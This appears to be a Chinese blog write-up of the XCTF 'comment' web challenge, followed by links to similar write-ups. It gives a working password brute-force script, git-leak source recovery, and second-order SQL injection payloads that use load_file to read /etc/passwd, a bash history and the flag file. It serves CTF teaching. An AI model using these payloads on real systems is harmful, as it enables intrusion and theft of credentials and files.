攻防世界 WEB COMMENT

最新推荐文章于 2024-01-28 14:00:27 发布
最新推荐文章于 2024-01-28 14:00:27 发布
阅读量300 收藏
点赞数 1
分类专栏: 攻防世界 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41696858/article/details/120103848
版权

三个点,git源码泄露,密码爆破,sql二次注入
点进去一个留言窗口,看了看源码,没啥
那就dirsearch扫一波,扫出来一堆git,那么就尝试GitHacker看看能不能跑出来源码
githacker --url http://111.200.241.244:49854/ --folder result3
进到result3里面发现一个write_do.php
看了看源码,明显没写完,case下面直接break
之前扫目录的时候还扫出来一个login.php,进去看看,发现用户名zhangwei,密码zhangwei***,看来是要爆破了
我本来是想着这可能是字母或者数字,结果在我计算了结果个数的时候,果断把字母可能性给去了,背一点的靶场超时了,密码可能还没跑出来
写个小脚本

import requests
import re
alphabets = ['0','1'
             ,'2','3','4','5','6','7','8','9']
keywords = []
for alpha1 in alphabets:
    for alpha2 in alphabets:
        for alpha3 in alphabets:
            keywords.append(alpha1+alpha2+alpha3)
url='http://111.200.241.244:49854/login.php'
s=requests.session()
username = 'zhangwei'
for i in keywords:
    password='zhangwei'+i
    data={
        'username':username,
        'password':password
    }
    response=s.post(url=url,data=data)
    if re.findall('alert',response.text)==[]:
        print(i)
        break

密码跑出来是zhangwei666
登录,查看控制台的时候发现有提示,程序员没commit就跑路了,emmmm,那就git log --reflog查看所有包含还没有提交的记录
git reset --hard e5b2a2443c2b6d395d06960123142bc91123148c更新到最新版本
再看看write_do.php,case里面果然有逻辑了,看一下源码

<?php
include "mysql.php";
session_start();
if($_SESSION['login'] != 'yes'){
    header("Location: ./login.php");
    die();
}
if(isset($_GET['do'])){
switch ($_GET['do'])
{
case 'write':
    $category = addslashes($_POST['category']);
    $title = addslashes($_POST['title']);
    $content = addslashes($_POST['content']);
    $sql = "insert into board
            set category = '$category',
                title = '$title',
                content = '$content'";
    $result = mysql_query($sql);
    header("Location: ./index.php");
    break;
case 'comment':
    $bo_id = addslashes($_POST['bo_id']);
    $sql = "select category from board where id='$bo_id'";
    $result = mysql_query($sql);
    $num = mysql_num_rows($result);
    if($num>0){
    $category = mysql_fetch_array($result)['category'];
    $content = addslashes($_POST['content']);
    $sql = "insert into comment
            set category = '$category',
                content = '$content',
                bo_id = '$bo_id'";
    $result = mysql_query($sql);
    }
    header("Location: ./comment.php?id=$bo_id");
    break;
default:
    header("Location: ./index.php");
}
}
else{
    header("Location: ./index.php");
}
?>

在category第一次insert以后,在comment.php里面调用的时候并没有用addslashes进行过滤,这就是本题的关键突破点
考虑comment里面的sql,

"insert into comment
            set category = '$category',
                content = '$content',
                bo_id = '$bo_id'";

由于category没有被过滤,而页面上content即留言的内容是有回显的,所以可以尝试利用category去覆盖原有的content
具体做法如下,在发布时category填入1’,content=database(),/*
在发布成功后再在留言板中填入*/#
这样第二个sql语句就变成了

insert into comment
            set category =1',content=database(),/*,
                content =*/#,
                bo_id = '$bo_id'

利用/**/和#注释掉了content和bo_id,这样会显得留言内容就是我们带过去的content
同理查看当前用户1',content=user(),/* */# root用户
查看/etc/passwd 1',content=(select(load_file('/etc/paawd'))),/* */# 可以看到www用户使用了bash
直接查找/和/var/www/html里面都没有flag文件,看来是换了文件名
那么去www用户的家目录看看1',content=(select(load_file('/home/www/.bash_history'))),/* */#

cd /tmp/ unzip html.zip rm -f html.zip cp -r html /var/www/ cd /var/www/html/ rm -f .DS_Store service apache2 start

可以看到www用户在/tmp目录下解压了文件,并向/var/www目录下进行了复制,且删除了.DS_Store文件(相当于目录描述文件,可以知道当前目录下有哪些文件)
所幸/tmp下还有,查看/tmp下的.DS_STORE文件,文件太大,需要转成16进制,再转成字符串

1',content=(select hex(load_file('/tmp/html/.DS_Store'))),/* */#

找到flag文件的文件名flag_8946e1ff1ee3e40f.php
在/tmp/html目录读取的flag是假flag,真flag当然在/var/www/html里

1',content=(select hex(load_file('/var/www/html/flag_8946e1ff1ee3e40f.php'))),/* */#

参考视频链接:https://www.bilibili.com/video/BV1FM4y1G75g/

显哥无敌
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
专栏目录
攻防世界Webcomment
Light_inthe_eyes的博客
11-03 219
发帖需要登录,提示了我们账户时zhangwei,密码是zhangweixxx,果断暴力破解,得到密码是zhangwei666: 然后发帖,想找到SQL的注入点,可是就是找不到,就翻了翻源代码,在控制台中发现了关键的提示: 提示了.git源码泄露,用御剑也得到了/.git,使用githacker看代码: 没看出什么来,突然想到前面说commit丢失了,那就要将它补上,涉及git修复,给个师傅的修复脚本:git修复 <?php include "mysql.php"; session_start(); i
攻防世界Wire1杂项
11-20
攻防世界Wire1杂项,misc。 此题详细解题博客:https://danbaku.blog.csdn.net/article/details/127951997
攻防世界高手进阶之Web comment
weixin_43093631的博客
06-09 1477
攻防世界高手进阶之Web comment 这题我在网上没找到Writeup,所有花了8金币买的。 这题主要考点 爆破 git泄露 代码审计 SQL注入 可以看到账号框账号为:zhangwei 密码为zhangwei*** 所以需要爆破zhangwei后面的三位数,我当时没想到这点看wp才明白的 user:zhangwei pass:zhangwei666 然后扫描目录的时候发现.git文件然后应该是有git源码泄露,过扫描发现到一个write_do.php文件 登陆成功后看到可以发帖加上题目提示sql,
xctf攻防世界 Web高手进阶区 comment
l8947943的博客
01-06 3322
1. 进入环境,查看内容 跳转到login.php 入手点是想办法登录后,再进行操作。 接下来一顿扫描瞅瞅: 2. 问题分析 想办法先登入进去 我们看到文本框提示已经给了zhangwei,密码是zhangwei***,其实就是三位字符补充,在此我们借助burpsuite进行跑字典,如图: 添加payloads,如图: Start attack!慢慢等吧,巨慢,如图: 发现当***为666时候请求302了,emmm,走起,如图: 利用.git获取源码 想到前面dirsearch出来的内容,根
攻防世界web进阶区comment详解
hxhxhxhxx的博客
08-11 1432
攻防世界web进阶区comment详解题目详解cp:.DS_Store 题目 详解 只要我们输入任何一个评论,他就会让我们进行登录, 我们可以通过他的文字提示,发现少了三位,一般我们都会上数字 我们发现他666的时候有一个302的跳转 登录以后,感觉也没有什么可以注入的 正常也没有回显,这时候,我们的御剑传来了好消息 有个.git,应该是git源码泄露。使用githack 下载源代码。 <?php include "mysql.php"; session_start(); if($_SESS
攻防世界-comment
xixihahawuwu的博客
12-15 214
一个留言板扫描目录,发现存在login.php界面。访问 给了我们一个并不完整的登录信息 爆破得到后三位密码666登录成功后发现返回之前的首页 根据题目描述,存在sql注入 扫描目录 发现存在git源码泄露 扒取源码发现write_do.php文件没有什么信息 检查页面元素时发现我们得到的码是不完整的,需要修复 修复完的源码如下: <?php include "mysql.php"; session_start(); if($_SESSION['login'] != 'yes'){ hea
攻防世界流量分析2杂项
11-20
攻防世界流量分析2杂项,misc。 此题详细解题博客:https://danbaku.blog.csdn.net/article/details/127953659
攻防世界running
11-15
攻防世界running杂项,misc。 此题详细解题博客:https://blog.csdn.net/m0_59188912/article/details/127861757
攻防世界Fakezip杂项
11-20
攻防世界Fakezip杂项】是一道网络安全领域中的挑战,属于攻防世界的Misc类问题。Misc( Miscellaneous)通常指的是涉及多种技术、需要综合运用知识的题目,这道题目的核心在于理解和处理压缩文件,特别是涉及到...
攻防世界杂项m0-01
11-13
攻防世界杂项m0_01,misc。 此题详细解题博客:https://blog.csdn.net/m0_59188912/article/details/127836871
攻防世界comment
qq_44065556的博客
09-16 465
刚进入看见画面 然后发现页面需要登录 输入框似乎给了提示 burp抓取 弱口令爆破 从爆破情况来看 密码应该是zhangwei666 登录后也没发现什么可以注入 也没有什么变化 习惯性的用dirsearch 扫一下 可以看到.git出现了 那应该是git源码泄露了, 用githack抓下来 我们查看我们抓下来的文件 可以判断 他的源码不完整 缺失了 用脚本给它补上 参考 -> CTF中的git泄露题目 - Tkitn - 博客园 ...
攻防世界 comment
CyhDl666的博客
02-26 478
进去是个留言板页面 发帖需要登录 未登录回跳转到登录页面 一不做二不休 直接dirsearch扫描一下 看看有哪些文件 芜湖!意外发现git泄露!! 还扫到了个mysql.php???访问好像没啥子用 以后再说 GitHack 下载了一下 发现只下载了给write_do.php 代码贴下 <?php include "mysql.php"; session_start(); if($_SESSION['login'] != 'yes'){ header("Location: ./log.
buuctf web mark loves cat
qq_41696858的博客
12-15 730
打开场景,是一个主页,先审计源码,发现很多a链接,但都是指向本页面的死链,没啥用 扫目录,python3 dirmap.py -i http://bba5d728-52ed-427c-bf70-629b758fa581.node4.buuoj.cn:81/ -lcf 扫出来一堆.git,那么就考虑git源码泄露 githacker --url http://bba5d728-52ed-427c-bf70-629b758fa581.node4.buuoj.cn:81/.git --folder result1
[网鼎杯 2018]Comment
K1ose的博客
03-23 161
首先访问题目链接; 试了一下xss,弹出一个登录框,需要登陆; 查看源码的时候发现了有write_do.php这个文件; 想到会不会有git泄露; 我用的是gitExtract; 发现果然有git泄露,看看源代码; 看看都拿到了什么文件; 第一个write_do.php中代码有缺省的情况,看了网上发现大家都用的是git恢复; 第二个文件write_do.php.8ef569就是源代码文件了,具体我也没有去分析GitExtract的代码是什么,可能是直接就尝试git恢复了; 这里把源码贴出来好分析; &
攻防世界-WEB-comment
最新发布
m0_52061428的博客
01-28 1519
write’操作将用户通过POST方法提交的数据插入到名为’board’的数据库表中,而’comment’操作将用户通过POST方法提交的评论数据插入到名为’comment’的数据库表中。而在comment中,由于他并未对category使用这个函数,原因可能是在comment.php中,我们并不能直接使用category。也就是说,我们可以通过查看www的历史记录以获取一些关键信息,这里我们需要知道的是flag在哪里。一般来说,bash的历史记录保存在home/用户/.bash_history中。
SQL注入的二阶注入攻击与环境搭建+防范方法
Zeker62的博客
09-01 833
目录什么是二阶注入?环境搭建登录界面:数据库连接代码:注册界面:修改密码界面漏洞复现漏洞分析漏洞防范什么是二阶注入? 二阶注入是指完成一次SQL注入攻击需要进行两次SQL注入(即至少两个不一样的SQL语句查询) 比如我在a页面进行了SQL注入,注入的结果在b页面进一步利用,并在b页面再进行注入,即可得到我们想要的结果。 所以,想要完成二阶注入的操作,至少需要在多页面互动 下面以一个注册+修改密码...
WEB漏洞攻防 - SQL注入 - 二次注入
易编橙 · 终身成长社群,相遇已是上上签!
08-02 1039
一句话概括 - 逻辑设计上导致的先写入再注入。 应用功能逻辑设计上导致的先写入后组合的注入(注入的一种分类,逻辑设计上存在的问题,先写入,再注入!) 可以理解为攻击者构造的恶意数据先存储在数据库,恶意数据被读取并在特定的场景执行SQL查询语句所导致的注入攻击。
攻防世界----unfinish
qq_44418229的博客
08-02 614
攻防世界--unfinish SQL的二次注入
SQL注入-二次注入攻击
m0_53820621的博客
08-16 428
二次注入漏洞是一种在 Web 应用程序中广泛存在的安全漏洞形式,二次注入漏洞更难以被发现,但是它却具有与一次注入攻击漏洞相同的攻击威力。在第一次进行数据库插入数据的时候,仅仅只是使用了addslashes或者是借助其他函数进行过滤,这些函数会在特殊字符前加\造成过滤的效果,但是\并不会插入在数据库中,我们输入的东西会原样储存到数据库中,虽然防止了一次注入,但如果可以二次使用该数据时,就有可能造成注入。二次注入通常存在用户注册->修改密码,邮箱注册->修改密码,文章添加->文章编辑。...
攻防世界web fileclude
07-27
攻防世界中的文件包含漏洞(File Inclusion Vulnerability)是一种常见的web安全漏洞。它主要出现在web应用程序中,当应用程序动态包含用户可控制的文件时,如果没有正确过滤和验证用户输入,攻击者可以利用这个漏洞...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值